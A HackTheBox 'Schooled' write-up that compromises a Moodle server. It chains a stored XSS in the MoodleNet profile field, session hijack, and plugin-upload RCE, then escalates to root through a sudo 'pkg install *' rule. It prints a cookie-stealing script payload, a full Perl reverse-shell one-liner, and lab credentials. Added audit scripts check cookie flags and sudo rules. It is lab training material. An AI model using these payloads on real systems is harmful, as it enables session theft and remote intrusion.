[HTB Writeup]: Schooled - HackTheBox Machine
Info⌗
Box | Name |
---|---|
IP | 10.10.10.234 |
OS | FreeBSD |
Pwned | True |
Vulnerability | Stored XSS/Session Hijack/Priv Esc/RCE |
Priv-esc | Sudo NOPASSWD for pkg install |
Obtained | N/A |
Retired | TRUE |
Recon⌗
The box schooled is rated as a medium box. It's based on FreeBSD 13 and features two vhosts: one with a static website and the other one with moodle version 3.9.0-beta.
Nmap⌗
A basic nmap scan reveals only three services. But before we begin, let's put schooled.htb in /etc/hosts.
╰─○ sudo nmap -Pn -sC -sV -p- --script-timeout 30 schooled.htb -oA tcp_schooled -vv
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 19:24 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating SYN Stealth Scan at 19:24
Scanning schooled.htb (10.10.10.234) [65535 ports]
Discovered open port 22/tcp on 10.10.10.234
Discovered open port 80/tcp on 10.10.10.234
Increasing send delay for 10.10.10.234 from 0 to 5 due to max_successful_tryno increase to 4
SYN Stealth Scan Timing: About 8.04% done; ETC: 19:31 (0:05:54 remaining)
SYN Stealth Scan Timing: About 15.46% done; ETC: 19:31 (0:05:34 remaining)
Discovered open port 33060/tcp on 10.10.10.234
SYN Stealth Scan Timing: About 21.49% done; ETC: 19:32 (0:05:54 remaining)
SYN Stealth Scan Timing: About 42.49% done; ETC: 19:34 (0:05:30 remaining)
Increasing send delay for 10.10.10.234 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.234 from 10 to 20 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.10.234 from 20 to 40 due to 103 out of 341 dropped probes since last increase.
SYN Stealth Scan Timing: About 48.15% done; ETC: 19:36 (0:06:00 remaining)
SYN Stealth Scan Timing: About 51.20% done; ETC: 19:38 (0:06:35 remaining)
Stats: 0:11:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.02% done; ETC: 19:43 (0:07:11 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.80% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.82% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.84% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.85% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.86% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
SYN Stealth Scan Timing: About 74.32% done; ETC: 19:47 (0:05:56 remaining)
SYN Stealth Scan Timing: About 80.77% done; ETC: 19:49 (0:04:46 remaining)
SYN Stealth Scan Timing: About 86.52% done; ETC: 19:50 (0:03:31 remaining)
SYN Stealth Scan Timing: About 91.95% done; ETC: 19:51 (0:02:11 remaining)
SYN Stealth Scan Timing: About 96.94% done; ETC: 19:52 (0:00:51 remaining)
Completed SYN Stealth Scan at 19:53, 1723.51s elapsed (65535 total ports)
Initiating Service scan at 19:53
Scanning 3 services on schooled.htb (10.10.10.234)
Completed Service scan at 19:53, 14.23s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 1.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for schooled.htb (10.10.10.234)
Host is up, received user-set (0.038s latency).
Scanned at 2021-06-30 19:24:48 CEST for 1739s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY8PnQ2GFk9RrUQ82xGivlyXZ8k99JFZAFlNqJIftRHSGWL3HsfaO08lnGCrqVxj3235k0L74SJAqWfJs1ykTRipcZpsI5QvwYPyqpisMgH/SdCH1wehZpgaXRwdn52ob9+GxZ6qjqIon0cH0XR1hkNIGdbTt4RRMy+IfynzVuomW2mUi0tnnXU69pcyYNMShND4PqxVDKZHwUyeDIiYVBvnL5P9qEh0Q/t0HKWFHQ8otwWEpL3jnn774RFP9ETtZsJ/xosuhty02yIZuP6vqtbWfVqcqM8v1R3jm/xjXfXxiflGO09KO2aePAbEhNEofb7V/f33dRQDv5mr9ceZ1
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHc4TgrG+CyKqaIsk10XmAhUKULXK6Bq3bHHeJiWuBmdGS1k3Fp60OoVFdDKQj9aihkaUmbJ8fkG6dp07bm8IcM=
| 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPWIP8gV7SGQNoODfYq9qg1k3j6ZZg+1L9zIU9FrHPaf
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1739.64 seconds
Raw packets sent: 68026 (2.993MB) | Rcvd: 111199 (13.540MB)
Poking around⌗
Three services are available: two well-known and up-to-date ones, an http and an ssh server, and a mysterious port 33060 that is not recognized by the scanner (3306, the default MySQL port, multiplied by 10?). The scanner's tentative mysqlx? label and the protobuf parse errors in its responses do fit the MySQL X Protocol, which listens on 33060 by default.
HTTP overview⌗
Leaving the other services for later, the first one to be tried is of course HTTP.
╰─○ curl -ksi http://schooled.htb
HTTP/1.1 200 OK
Date: Wed, 30 Jun 2021 19:43:48 GMT
Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
Last-Modified: Sat, 19 Dec 2020 17:23:57 GMT
ETag: "510e-5b6d47d6a6540"
Accept-Ranges: bytes
Content-Length: 20750
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
[...]
The server is Apache 2.4.46 running with PHP 7.4.15, and the address http://schooled.htb presents a static website.
Further research shows that there is not much info there. Even the contact form /contact.html is not working properly (there is no such file as contact.php).
The natural thing to check in this case is to run a vhost fuzzer against the target server.
╰─○ gobuster vhost -u http://schooled.htb/ -w /usr/share/dirb/wordlists/common.txt -o subdomains_80_gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://schooled.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/30 20:56:57 Starting gobuster in VHOST enumeration mode
===============================================================
Found: @.schooled.htb (Status: 400) [Size: 347]
Found: ~adm.schooled.htb (Status: 400) [Size: 347]
Found: ~admin.schooled.htb (Status: 400) [Size: 347]
Found: ~administrator.schooled.htb (Status: 400) [Size: 347]
Found: ~amanda.schooled.htb (Status: 400) [Size: 347]
Found: ~apache.schooled.htb (Status: 400) [Size: 347]
Found: ~bin.schooled.htb (Status: 400) [Size: 347]
Found: ~ftp.schooled.htb (Status: 400) [Size: 347]
Found: ~guest.schooled.htb (Status: 400) [Size: 347]
Found: ~http.schooled.htb (Status: 400) [Size: 347]
Found: ~nobody.schooled.htb (Status: 400) [Size: 347]
Found: ~logs.schooled.htb (Status: 400) [Size: 347]
Found: ~mail.schooled.htb (Status: 400) [Size: 347]
Found: ~lp.schooled.htb (Status: 400) [Size: 347]
Found: ~log.schooled.htb (Status: 400) [Size: 347]
Found: ~httpd.schooled.htb (Status: 400) [Size: 347]
Found: ~operator.schooled.htb (Status: 400) [Size: 347]
Found: ~root.schooled.htb (Status: 400) [Size: 347]
Found: ~sys.schooled.htb (Status: 400) [Size: 347]
Found: ~sysadm.schooled.htb (Status: 400) [Size: 347]
Found: ~sysadmin.schooled.htb (Status: 400) [Size: 347]
Found: ~test.schooled.htb (Status: 400) [Size: 347]
Found: ~user.schooled.htb (Status: 400) [Size: 347]
Found: ~tmp.schooled.htb (Status: 400) [Size: 347]
Found: ~www.schooled.htb (Status: 400) [Size: 347]
Found: ~webmaster.schooled.htb (Status: 400) [Size: 347]
Found: lost+found.schooled.htb (Status: 400) [Size: 347]
Found: moodle.schooled.htb (Status: 200) [Size: 84]
Given the fact that there is only one 200 return code, the moodle vhost seems interesting.
There are four courses there and a login page that can be used to log in or register an account. The only thing checked at registration is the domain of the e-mail address: it has to be @student.schooled.htb.
Unfortunately the student privilege is not enough to do anything interesting within the moodle software. But the newly created student is able to enroll in the Maths course.
The message from the lecturer says that he will be checking periodically to ensure that all students have filled in the MoodleNet part of their profile. MoodleNet is a social media platform for educators.
Fortunately for us, there is a stored XSS vulnerability in the MoodleNet field inside the students' profile. This vuln is described here and, as the commit shows, it's due to a lack of sanitization of the userprofile field:
diff --git a/admin/tool/moodlenet/classes/profile_manager.php b/admin/tool/moodlenet/classes/profile_manager.php
index f1a922a..49027fd 100644 (file)
--- a/admin/tool/moodlenet/classes/profile_manager.php
+++ b/admin/tool/moodlenet/classes/profile_manager.php
@@ -46,7 +46,7 @@ class profile_manager {
$user = \core_user::get_user($userid, 'moodlenetprofile');
try {
$userprofile = $user->moodlenetprofile ? $user->moodlenetprofile : '';
- return (isset($user)) ? new moodlenet_user_profile($userprofile, $userid) : null;
+ return (isset($user)) ? new moodlenet_user_profile(s($userprofile), $userid) : null;
} catch (\moodle_exception $e) {
// If an exception is thrown, means there isn't a valid profile set. No need to log exception.
return null;
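Review bot: the `isset($user)` guard on the changed line comes after `$user->moodlenetprofile` has already been dereferenced two lines earlier, so it can never catch a missing user (`\core_user::get_user()` returning false still satisfies `isset`); move the check before the `$userprofile` assignment, e.g. `if (!$user) { return null; }`. Wrapping the value in `s()` here escapes at construction time rather than at output, so every consumer of `moodlenet_user_profile` now receives an HTML-escaped string; that is fine for rendering but worth noting for any code that uses the raw profile handle.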
@@ -59,7 +59,7 @@ class profile_manager {
if ($field->get_category_name() == self::get_category_name()
&& $field->inputname == 'profile_field_mnetprofile') {
try {
- return new moodlenet_user_profile($field->display_data(), $userid);
+ return new moodlenet_user_profile(s($field->display_data()), $userid);
} catch (\moodle_exception $e) {
// If an exception is thrown, means there isn't a valid profile set. No need to log exception.
return null;
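Review bot: the same `s()` call is now duplicated at both construction sites of `moodlenet_user_profile`, so a third call site would silently miss the escaping; consider doing the escaping once inside the `moodlenet_user_profile` constructor (or at render time) and leaving these call sites unchanged. The identical catch-and-return-null block in both hunks could be shared the same way.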
Given the fact that the lecturer is checking the students' profiles, it's likely he will trigger the JS payload. This allows us to perform a session hijacking attack by stealing the MoodleSession cookie.
In my case the following XSS payload worked on the first try:
<script>new Image().src="http://IP/c.php?c="+document.cookie;</script>
Setting up the listener (I’m using this python server script for logging GET/POST requests)
╰─○ sudo python3 server.py 80
INFO:root:Starting httpd...
INFO:root:GET request,
Path: /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v
Headers:
Host: 10.10.14.7
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=28
10.10.10.234 - - [30/Jun/2021 22:35:00] "GET /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v HTTP/1.1" 200 -
the cookie can be obtained. It allows us to elevate our privileges to teacher.
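As an added defensive check that is not part of the original writeup: the script below approximates what the Moodle fix does (escaping the stored value the way the s() helper does, here with Python's html.escape), audits moodlenetprofile values from mdl_user against the expected @user@host handle format, and inspects a Set-Cookie header for the attributes that would have kept MoodleSession out of document.cookie. The sample rows and headers are constructed, and the handle regex is an assumption.

```python
import html
import re

# Expected shape of a MoodleNet profile handle, e.g. "@oliver@moodle.net".
# Assumption: anything else (HTML, script, URLs) is not a valid handle.
HANDLE_RE = re.compile(r"^@[A-Za-z0-9_.-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

# Attributes a session cookie should carry. HttpOnly alone would have stopped
# document.cookie from reading MoodleSession in the XSS above.
REQUIRED_COOKIE_ATTRS = ("httponly", "secure", "samesite")


def escape_profile(value: str) -> str:
    """Approximation of Moodle's s() helper: HTML-escape the stored value so
    markup in it is rendered as text instead of being interpreted."""
    return html.escape(value, quote=True)


def audit_moodlenet_profiles(rows):
    """Return the user ids whose moodlenetprofile value does not look like a
    MoodleNet handle. rows is an iterable of (id, moodlenetprofile) tuples as
    they would come from mdl_user; empty/NULL values mean the field is unset."""
    flagged = []
    for user_id, profile in rows:
        if profile is None or profile == "":
            continue
        if not HANDLE_RE.match(profile):
            flagged.append(user_id)
    return flagged


def session_cookie_findings(set_cookie_header: str, name: str = "MoodleSession"):
    """Parse one Set-Cookie header and return the required attributes that are
    missing for the named session cookie (an empty list means all present)."""
    parts = [p.strip() for p in set_cookie_header.split(";") if p.strip()]
    if not parts or parts[0].split("=", 1)[0].strip() != name:
        return []  # not the cookie we are auditing
    present = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return [attr for attr in REQUIRED_COOKIE_ATTRS if attr not in present]


# Constructed sample rows (id, moodlenetprofile); id 28 carries the kind of
# payload used in the writeup, id 31 is malformed but harmless.
SAMPLE_ROWS = [
    (3, "@oliver@moodle.net"),
    (4, ""),
    (28, '<script>new Image().src="http://IP/c.php?c="+document.cookie;</script>'),
    (31, "@bad@x"),
]

# Constructed headers: the weak one lacks HttpOnly/Secure/SameSite (in Moodle
# these are governed by the cookiehttponly and cookiesecure settings).
WEAK_COOKIE = "MoodleSession=3r6ht858ruacr94qjjlogs992v; path=/moodle/"
HARDENED_COOKIE = ("MoodleSession=3r6ht858ruacr94qjjlogs992v; path=/moodle/; "
                   "HttpOnly; Secure; SameSite=Lax")

if __name__ == "__main__":
    print("flagged profiles:", audit_moodlenet_profiles(SAMPLE_ROWS))
    print("escaped:", escape_profile(SAMPLE_ROWS[2][1]))
    print("weak cookie missing:", session_cookie_findings(WEAK_COOKIE))
    print("hardened cookie missing:", session_cookie_findings(HARDENED_COOKIE))
```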
Foothold⌗
In moodle version 3.9.0-Beta an RCE vulnerability exists. It can be triggered by the manager role, to which the teacher can be elevated.
There are multiple ways to exploit it, but I've gone with the following exploit. This one didn't work for me and I didn't bother to fix it.
The exploit I used has a downside: it can be triggered only once, and then it doesn't work anymore. So after a few attempts to get a reverse shell connection I gave up on the bash payloads (I didn't find python[3] on the box either) and decided to change my strategy.
The vulnerability relies on uploading a plugin inside a zip archive. So I've changed the payload to the php reverse shell from here, converted it to base64 and put it back in the zip archive.
This allowed me to gain a shell as the www user:
╰─○ sudo nc -nvlp 443
[sudo] password for:
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.234] 37349
FreeBSD Schooled 13.0-BETA3 FreeBSD 13.0-BETA3 #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
8:11PM up 3:36, 0 users, load averages: 0.71, 0.48, 0.43
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
On the system there are two users with a /home directory.
Priv Esc⌗
Vertical priv esc⌗
Information about the database used by moodle can be obtained from the config.php file.
$ cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8_unicode_ci',
);
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
To connect to the database, the mysql binary will be handy.
$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020
mysql: [Warning] Using a password on the command line interface can be insecure.
use moodle;
show tables;
Tables_in_moodle
[...]
Users are stored in the mdl_user table, together with their bcrypt password hashes.
There are some staff members, and the administrator of this moodle instance (the admin account belongs to Jamie Borham, jamie@staff.schooled.htb) is probably also a user on the box. So I've tried to crack the admin's hash $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW.
╰─○ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:21 0,03% (ETA: 16:00:37) 0g/s 284.2p/s 284.2c/s 284.2C/s april20..coolchick
0g 0:00:00:22 0,04% (ETA: 16:02:33) 0g/s 283.0p/s 283.0c/s 283.0C/s sydney1..hotness
!QAZ2wsx (?)
1g 0:00:00:53 DONE (2021-06-30 23:06) 0.01869g/s 260.4p/s 260.4c/s 260.4C/s 110689..kuuipo
Use the "--show" option to display all of the cracked passwords reliably
Using this password I was able to connect using ssh.
╰─○ ssh jamie@schooled.htb
Password for jamie@Schooled:
Last login: Tue Mar 16 14:44:53 2021 from 10.10.14.5
FreeBSD 13.0-BETA3 (GENERIC) #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
To change this login announcement, see motd(5).
To see the last 10 lines of a long file, use "tail filename". To see the
first 10 lines, use "head filename". To see new lines as they're appended
to a file, use "tail -f filename".
-- Dru <genesis@istar.ca>
jamie@Schooled:~ $ ls
user.txt
Enumerating the sudo privileges of the jamie account, I found out that he can run pkg install with a wildcard (*) argument.
jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
(ALL) NOPASSWD: /usr/sbin/pkg update
(ALL) NOPASSWD: /usr/sbin/pkg install *
Following this methodology I was able to create the package. Instead of the id command, I've used the perl reverse shell payload:
perl -e 'use Socket;$i="10.10.14.7";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And this allowed me to gain the root shell on the box!
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# ls
.cache
.cshrc
.history
.k5login
.lesshst
.login
.profile
.shrc
.ssh
root.txt
scripts
# cat root.txt
518af4d67b32bf39c4f0d07e40331cb3
# ip a
/bin/sh: ip: not found
# ipconfig
/bin/sh: ipconfig: not found
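As an added check that is not part of the original writeup: the parser below reads sudo -l output (the two rules shown above, embedded as constructed sample input) and flags rules that let a user run a package installer with a wildcard argument, which is exactly the pkg install * case that a self-built package turns into root. The set of installer binaries is an assumption.

```python
import os
import re

# Binaries that install files (and run package scripts) as root; a wildcard
# argument on any of them lets the caller choose what gets installed.
# Assumption: this set is illustrative, extend it for the systems you audit.
INSTALLER_BINARIES = {"pkg", "dpkg", "rpm", "apt", "apt-get", "yum", "dnf", "pip", "pip3"}

# One "sudo -l" rule line: "(runas) [TAG: ...] command [args...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?:(?P<tags>(?:\w+:\s*)+))?(?P<cmd>.+)$")


def parse_sudo_l(text: str):
    """Parse 'sudo -l' output into dicts with runas, nopasswd, command, args."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue  # header lines such as "User jamie may run ..."
        tags = (m.group("tags") or "").upper()
        parts = m.group("cmd").split()
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in tags,
            "command": parts[0],
            "args": parts[1:],
        })
    return rules


def risky_rules(rules):
    """Return the rules that let the user run an installer with a wildcard
    argument: the binary is in INSTALLER_BINARIES and some argument is '*'."""
    out = []
    for rule in rules:
        binary = os.path.basename(rule["command"])
        if binary in INSTALLER_BINARIES and any(a == "*" for a in rule["args"]):
            out.append(rule)
    return out


def audit(text: str):
    """Return the command lines of the rules worth raising with the admins."""
    return [" ".join([r["command"]] + r["args"]) for r in risky_rules(parse_sudo_l(text))]


# Constructed sample: the sudoers entries shown in the writeup.
SAMPLE_SUDO_L = """User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
"""

if __name__ == "__main__":
    for cmd in audit(SAMPLE_SUDO_L):
        print("risky rule:", cmd)
```

The fix on the sudoers side is to drop the wildcard and allow only a fixed package name or a repository-managed update, since pkg install on an arbitrary local archive runs that archive's scripts as root.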
Post exploitation⌗
N/A